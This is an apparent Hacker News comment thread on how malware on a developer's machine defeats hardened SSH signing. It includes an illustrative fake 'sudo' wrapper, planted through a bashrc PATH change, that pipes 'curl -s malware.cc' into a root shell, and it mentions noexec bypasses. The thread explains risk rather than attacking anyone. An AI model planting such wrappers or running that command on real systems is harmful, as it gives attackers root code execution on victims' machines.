I can type up a test case on my phone:

The malware puts this in your bashrc or equivalent:

    PATH=/tmp/malware/bin:$PATH

In /tmp/malware/bin/sudo:

    #!/bin/bash
    /sbin/sudo bash -c "curl -s malware.cc|sh && $@"

You get the idea. It can do something similar to the git binary and hijack "git commit" such that it will amend whatever it wants and you will happily sign it and push it using your hardened SSH agent.

You say it's unlikely, fine, so your risk appetite is sufficiently high. I just want to highlight the risk.

If your machine is compromised, it's game over.

▲ otterley 6 hours ago | parent [-]

Typical defense against this is to mount all user-writable filesystems as `noexec` but unfortunately most OSes don't do that out of the box.

	▲	mr_mitm 6 hours ago \| parent \| next [-]
		It could have created a bash alias then. And I don't think a dev wants to be restricted in creating executables. Again, if a dev can do it, so can the malware.
	▲	dividuum 4 hours ago \| parent \| prev \| next [-]
		I remember you could trivially circumvent that with „/lib/ld-linux.so <executable>“. Does that no longer work?
	▲	LtWorf 2 hours ago \| parent \| prev [-]
		Kinda hard to work as a software developer then.